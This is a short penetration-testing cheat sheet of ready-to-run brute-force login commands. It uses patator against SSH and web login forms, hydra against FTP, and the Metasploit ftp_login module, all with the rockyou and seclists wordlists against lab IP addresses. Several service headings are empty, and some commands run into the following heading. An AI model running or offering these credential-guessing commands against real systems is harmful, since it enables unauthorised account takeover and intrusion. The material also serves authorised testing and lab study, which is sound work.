Brute-Force attack
SSH
patator ssh_login host=10.5.5.11 port=22 user=dev password=FILE0 0=/usr/share/wordlists/rockyou.txt persistent=0 -x ignore:mesg='Authentication failed.' -x quit:code=0FTP
hydra -l user -P /usr/share/wordlists/rockyou.txt -t 32 ftp://192.168.0.1
# Metasploit
msf
use auxiliary/scanner/ftp/ftp_login
msf auxiliary(ftp_login) > show options
msf auxiliary(ftp_login) > set PASS_FILE /usr/share/wordlist/rockyou.txt
msf auxiliary(ftp_login) > set USER_FILE ./users.txt
msf auxiliary(ftp_login) > set RHOSTS 10.11.1.8,13,14,22
msf auxiliary(ftp_login) > runHTTP/HTTPS GET
patator http_fuzz method=GET follow=0 accept_cookie=0 --threads=1 timeout=10 url="http://192.168.1.44/?username=FILE1&password=FILE0&Login=Login"
0=/usr/share/seclists/Usernames/top_shortlist.txt 1=/usr/share/seclists/Passwords/rockyou-40.txt header="Cookie: security=low; PHPSESSID=${SESSIONID}" -x quit:fgrep='Welcome to the password protected area'
patator http_fuzz method=GET follow=0 accept_cookie=0 timeout=10 url="http://192.168.142.214/admin.php?username=FILE0&password=FILE1" 0=ldap.txt 1=ldap.txt -x ignore:fgrep='Invalid login'
patator http_fuzz method=GET follow=0 accept_cookie=0 timeout=10 url="http://192.168.142.214/admin.php?username=FILE0&password=FILE1" 0=ldap.txt 1=ldap.txt -x ignore:fgrep='Invalid login'
HTTP/HTTPS POST
HTTP BASIC AUTH (in case of tomcat platform )
HTTP POST with cewl
SMB
RDP
MSSQL
WordPress
Last updated